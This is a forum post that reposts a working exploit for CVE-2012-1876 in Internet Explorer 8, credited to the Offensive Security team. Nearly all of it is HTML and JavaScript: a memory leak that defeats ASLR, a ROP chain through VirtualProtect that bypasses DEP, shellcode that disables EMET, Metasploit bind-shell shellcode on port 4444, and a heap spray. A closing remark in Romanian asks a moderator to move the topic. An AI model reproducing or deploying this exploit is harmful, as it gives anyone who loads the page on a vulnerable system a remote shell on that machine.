Jump to content
sensi

Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 4.1.X Bypass

Recommended Posts

Posted (edited)

<!--
** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 4.1.X bypass
** Offensive Security Research Team
** http://www.offensive-security.com/vulndev/disarming-enhanced-mitigation-experience-toolkit-emet
** Affected Software: Internet Explorer 8
** Vulnerability: Fixed Col Span ID
** CVE: CVE-2012-1876
** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 4.1.X
-->

<html>
<body>
<div id="evil"></div>
<table style="table-layout:fixed" ><col id="132" width="41" span="9" > </col></table>
<script language='javascript'>

function strtoint(str) {
return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);
}

var free = "EEEE";
while ( free.length < 500 ) free += free;

var string1 = "AAAA";
while ( string1.length < 500 ) string1 += string1;

var string2 = "BBBB";
while ( string2.length < 500 ) string2 += string2;

var fr = new Array();
var al = new Array();
var bl = new Array();

var div_container = document.getElementById("evil");
div_container.style.cssText = "display:none";

for (var i=0; i < 500; i+=2) {
fr[i] = free.substring(0, (0x100-6)/2);
al[i] = string1.substring(0, (0x100-6)/2);
bl[i] = string2.substring(0, (0x100-6)/2);
var obj = document.createElement("button");
div_container.appendChild(obj);
}

for (var i=200; i<500; i+=2 ) {
fr[i] = null;
CollectGarbage();
}

function heapspray(cbuttonlayout) {
CollectGarbage();
var rop = cbuttonlayout + 4161; // RET
var rop = rop.toString(16);
var rop1 = rop.substring(4,8);
var rop2 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 11360; // POP EBP
var rop = rop.toString(16);
var rop3 = rop.substring(4,8);
var rop4 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 111675; // XCHG EAX,ESP
var rop = rop.toString(16);
var rop5 = rop.substring(4,8);
var rop6 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 12377; // POP EBX
var rop = rop.toString(16);
var rop7 = rop.substring(4,8);
var rop8 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 642768; // POP EDX
var rop = rop.toString(16);
var rop9 = rop.substring(4,8);
var rop10 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 12201; // POP ECX --> Changed
var rop = rop.toString(16);
var rop11 = rop.substring(4,8);
var rop12 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 5504544; // Writable location
var rop = rop.toString(16);
var writable1 = rop.substring(4,8);
var writable2 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 12462; // POP EDI
var rop = rop.toString(16);
var rop13 = rop.substring(4,8);
var rop14 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 12043; // POP ESI --> changed
var rop = rop.toString(16);
var rop15 = rop.substring(4,8);
var rop16 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 63776; // JMP EAX
var rop = rop.toString(16);
var jmpeax1 = rop.substring(4,8);
var jmpeax2 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 85751; // POP EAX
var rop = rop.toString(16);
var rop17 = rop.substring(4,8);
var rop18 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 4936; // VirtualProtect()
var rop = rop.toString(16);
var vp1 = rop.substring(4,8);
var vp2 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]
var rop = rop.toString(16);
var rop19 = rop.substring(4,8);
var rop20 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 234657; // PUSHAD
var rop = rop.toString(16);
var rop21 = rop.substring(4,8);
var rop22 = rop.substring(0,4); // } RET


var rop = cbuttonlayout + 408958; // PUSH ESP
var rop = rop.toString(16);
var rop23 = rop.substring(4,8);
var rop24 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 2228408; // POP ECX
var rop = rop.toString(16);
var rop25 = rop.substring(4,8);
var rop26 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 1586172; // POP EAX
var rop = rop.toString(16);
var rop27 = rop.substring(4,8);
var rop28 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]
var rop = rop.toString(16);
var rop29 = rop.substring(4,8);
var rop30 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 1884912; // PUSH EAX
var rop = rop.toString(16);
var rop31 = rop.substring(4,8);
var rop32 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 2140694; // ADD EAX,ECX
var rop = rop.toString(16);
var rop33 = rop.substring(4,8);
var rop34 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX
var rop = rop.toString(16);
var rop35 = rop.substring(4,8);
var rop36 = rop.substring(0,4); // } RET

var rop = cbuttonlayout + 5036248; // ADD ESP,0C
var rop = rop.toString(16);
var rop37 = rop.substring(4,8);
var rop38 = rop.substring(0,4); // } RET

var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW
var getmodulew = getmodulew.toString(16);
var getmodulew1 = getmodulew.substring(4,8);
var getmodulew2 = getmodulew.substring(0,4); // } RET

var getprocaddr = cbuttonlayout + 4836; // GetProcAddress
var getprocaddr = getprocaddr.toString(16);
var getprocaddr1 = getprocaddr.substring(4,8);
var getprocaddr2 = getprocaddr.substring(0,4); // } RET

var shellcode = unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING
shellcode+= unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING
shellcode+= unescape("%u4141%u4141"); // PADDING

shellcode+= unescape("%u"+rop1+"%u"+rop2); // RETN
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN
shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP # RETN

// EMET disable part 0x01
// Implement the Tachyon detection grid to overcome the Romulan cloaking device.
shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN
shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2); // GetModuleHandleW
shellcode+= unescape("%u"+rop29+"%u"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN
shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN
shellcode+= unescape("%u101C%u076d"); // EMET string
shellcode+= unescape("%ue220%u0007"); // EMET offset
shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN
shellcode+= unescape("%u0000%u0000"); // Zero out ECX
shellcode+= unescape("%u"+rop35+"%u"+rop36); // MOV DWORD PTR [EAX],ECX # RETN
shellcode+= unescape("%u"+rop37+"%u"+rop38); // ADD ESP,0C # RETN
shellcode+= "EMET"; // EMET string
shellcode+= unescape("%u0000%u0000"); // EMET string
// EMET disable part 0x01 end

// Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP
shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBP
shellcode+= unescape("%u1024%u0000"); // Size 0x00001024
shellcode+= unescape("%u"+rop9+"%u"+rop10); // POP EDX
shellcode+= unescape("%u0040%u0000"); // 0x00000040
shellcode+= unescape("%u"+rop11+"%u"+rop12); // POP ECX
shellcode+= unescape("%u"+writable1+"%u"+writable2); // Writable Location
shellcode+= unescape("%u"+rop13+"%u"+rop14); // POP EDI
shellcode+= unescape("%u"+rop1+"%u"+rop2); // RET
shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI
shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2); // JMP EAX
shellcode+= unescape("%u"+rop17+"%u"+rop18); // POP EAX
shellcode+= unescape("%u"+vp1+"%u"+vp2); // VirtualProtect()
shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]
shellcode+= unescape("%u"+rop21+"%u"+rop22); // PUSHAD
shellcode+= unescape("%u"+rop23+"%u"+rop24); // PUSH ESP
shellcode+= unescape("%u9090%u9090"); // NOPs

// EMET disable part 0x02
// Execute the Corbomite bluff to disarm EAF
shellcode+= unescape("%uc0b8%u6d10");
shellcode+= unescape("%u8b07%u8b00");
shellcode+= unescape("%u6800%u10c8");
shellcode+= unescape("%u076d%ud0ff");
shellcode+= unescape("%ud468%u6d10");
shellcode+= unescape("%u5007%uc4b8");
shellcode+= unescape("%u6d10%u8b07");
shellcode+= unescape("%u8b00%uff00");
shellcode+= unescape("%u8bd0%u81f0");
shellcode+= unescape("%uccec%u0002");
shellcode+= unescape("%uc700%u2404");
shellcode+= unescape("%u0010%u0001");
shellcode+= unescape("%ufc8b%uccb9");
shellcode+= unescape("%u0002%u8300");
shellcode+= unescape("%u04c7%ue983");
shellcode+= unescape("%u3304%uf3c0");
shellcode+= unescape("%u54aa%ufe6a");
shellcode+= unescape("%ud6ff%u9090");
shellcode+= unescape("%u9090%u9090"); // NOPs
shellcode+= unescape("%u9090%u29eb"); // NOPs
shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2); // GetModuleHandleW
shellcode+= unescape("%u"+getprocaddr1+"%u"+getprocaddr2); // GetProcAddress
shellcode+= "NTDLL";
shellcode+= unescape("%u0000");
shellcode+= unescape("%u744e%u6553"); // NtSetContextThread
shellcode+= unescape("%u4374%u6e6f");
shellcode+= unescape("%u6574%u7478");
shellcode+= unescape("%u6854%u6572");
shellcode+= unescape("%u6461%u0000");
shellcode+= unescape("%u9090%u9090"); // NOPs
shellcode+= unescape("%u9090%u9090"); // NOPs
// EMET disable part 0x02 end

// Bind shellcode on 4444
// msf > generate -t js_le
// windows/shell_bind_tcp - 342 bytes
// http://www.metasploit.com
// VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
// EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
// I would keep the shellcode the same size for better reliability

shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +
"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +
"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +
"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +
"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +
"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +
"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +
"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +
"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +
"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +
"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +
"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +
"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +
"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +
"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +
"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +
"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +
"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +
"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +
"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +
"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +
"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +
"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +
"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +
"%u006a%uff53%u41d5");

// Total spray should be 1000
var padding = unescape("%u9090");
while (padding.length < 1000)
padding = padding + padding;
var padding = padding.substr(0, 1000 - shellcode.length);

shellcode+= padding;

while (shellcode.length < 100000)
shellcode = shellcode + shellcode;

var onemeg = shellcode.substr(0, 64*1024/2);

for (i=0; i<14; i++) {
onemeg += shellcode.substr(0, 64*1024/2);
}

onemeg += shellcode.substr(0, (64*1024/2)-(38/2));

var spray = new Array();

for (i=0; i<100; i++) {
spray[i] = onemeg.substr(0, onemeg.length);
}
}

function leak(){
var leak_col = document.getElementById("132");
leak_col.width = "41";
leak_col.span = "19";
}

function get_leak() {
var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));
str_addr = str_addr - 1410704;
var hex = str_addr.toString(16);
//alert(hex);
setTimeout(function(){heapspray(str_addr)}, 50);
}

function trigger_overflow(){
var evil_col = document.getElementById("132");
evil_col.width = "1245880";
evil_col.span = "44";
}

setTimeout(function(){leak()}, 400);
setTimeout(function(){get_leak()},450);
setTimeout(function(){trigger_overflow()}, 700);

</script>
</body>
</html>

source

// Da ai dreptate, nu vazusem... defapt nici titlul nu-i chiar sugestiv. Rog un moderator sa mute/stearga topicul.

Edited by sensi

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...